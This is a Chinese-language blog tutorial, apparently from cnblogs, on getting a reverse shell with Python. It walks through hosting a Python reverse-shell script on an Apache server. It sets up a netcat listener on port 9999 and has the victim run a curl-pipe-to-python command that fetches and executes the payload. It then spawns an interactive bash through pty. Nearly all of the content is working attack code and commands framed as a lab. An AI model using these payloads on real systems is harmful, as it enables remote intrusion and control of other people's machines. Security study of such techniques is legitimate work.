首页 > 系统相关 >用python反弹shell

用python反弹shell

时间:2022-09-07 00:23:55浏览次数:69  
标签:www shell socket python apache2 ## 反弹

用python反弹shell

攻击机:linux(本文章使用ubuntu)

受害主机:安装了python的windows或者linux(本文章受害主机为kali linux)

1.配置环境:windows安装python , python官网地址: www.python.org ;linux:sudo apt-get install python3

2.攻击机开启http服务,apt install -y apache2   ##本次实验用apache

vi /etc/apache2/sites-enabled/000-default.conf  ## 编辑此文件,修改一下配置

               <VirtualHost *:80>  ## 其他行不变

               DocumentRoot /var/www/html   ## 浏览器访问目录

rm /var/www/html/index.html   ##删除自带主页

/etc/init.d/apache2 restart  ## 重启apache服务

service apache2 status  ## 查看apache2状态,应为active(running)状态

 

 

 3.cd /var/www/html  ## 切换到/var/www/html目录下

 touch reverse_python_shell.py  ## 创建文件

 vi reverse_python_shell.py ## 编辑文件

##.py文件内容

import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(("192.168.106.139",9999)) #更改IP为自己的外网IP,端口自定义

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

p=subprocess.call(["/bin/sh","-i"])

*编辑完后按Esc,再按:,输入wq,按回车

4.攻击机要安装netcat,输入以下命令:

sudo apt-get -y install netcat-traditional

sudo update-alternatives --config nc

nc -lvvp 9999 ## 对9999端口进行监听

5.在受害机上召唤出cmd,输入:curl 192.168.106.139/reverse_py_shell.py | python  ## 将文件导入python进行执行

 

 

 

6.反连成功,以下为攻击机终端界面

 

*python -c ‘import pty;pty.spawn(“/bin/bash”)’    ## 因为已知目标主机安装了python,所以可以引入pty终端库,派生出bash ##bash是linux shell的一种,在bash中可以更方便的进行命令输入

 

 


 

标签:www,shell,socket,python,apache2,##,反弹
From: https://www.cnblogs.com/mel0n/p/16663823.html

相关文章

  • Python文件和异常(五)
    一、从文件中读取数据open()函数参数file文件路径modemode参数可做操作若文件不存在如何处理原内容r只可读报错-r+可读可写报错是w只可......
  • Python爬虫入门笔记
    一、requests请求库requests安装:pipinstallrequestsrequest使用3步骤①导入模块②发送get请求,获取响应:response=requests.get(url)③从响应中获取数据#1.导......
  • Python入门系列(十一)一篇搞定python操作MySQL数据库
    开始安装MySQL驱动$python-mpipinstallmysql-connector-python测试MySQL连接器importmysql.connector测试MySQL连接importmysql.connectormydb=mysql.c......
  • python fastapi + uvicorn 记录日志的最佳实践,结合nb_log
      pythonfastapi+uvicorn记录日志的最佳实践,要记录对fastapi什么时候请求了什么url和入参,只需要记录uvicorn命名空间的日志就可以了。文章使用nb_log五彩日志来......
  • 奶奶常说,黑白照片看的不清晰,还好我会Python,分分钟给她变成彩色的~
    咳咳~其实是奶奶常说,艾欧尼亚昂扬不灭,正义将指引着我们! 好吧,并不是奶奶说,只是最近回家发现一些黑白老照片,看着不够清晰,然后实验了一波用Python把老照片变成彩......
  • 记如何让Visual Studio、Powershell和Git for Windows和谐共处
    目录前言环境解决方案步骤原理前言VisualStudio在2019版本中正式加入了对Git的支持。但如果未进行过相关的环境配置,在VS中使用内置Git将无法与SSH仓库同步。尤其是习惯......
  • jenkins+python构建项目
    1.下载jenkinswindows版本2.安装:需要检验端口,因为本机8080被别的项目占用了,选择了80端口3.新建一个free风格项目  配置:github,github管理代码,相当于本地代码需要推......
  • centos 7.X 安装python3.X 使得python3.X 和 python2.x共存
    https://www.cnblogs.com/JahanGu/p/7452527.html(以亲试)https://blog.csdn.net/eastlhu/article/details/74931913https://www.cnblogs.com/FZfangzheng/p/7588944.html......
  • python(三)函数
    (六)字符串的比较is是通过比较两个对象的内存地址,查看内存地址的方法是id()in是包含==是类型和内容一致a=1b=1print(id(a))print(id(b))ifaisb: print......
  • pythonⅢ
    '''字符串的比较is:看通过id()对象的内存地址,查看内存地址的方式in:包含==:类型及内容一致'''a=1b=1print(id(a))print(id(b))ifaisb:    print('a和b内存地址都一样......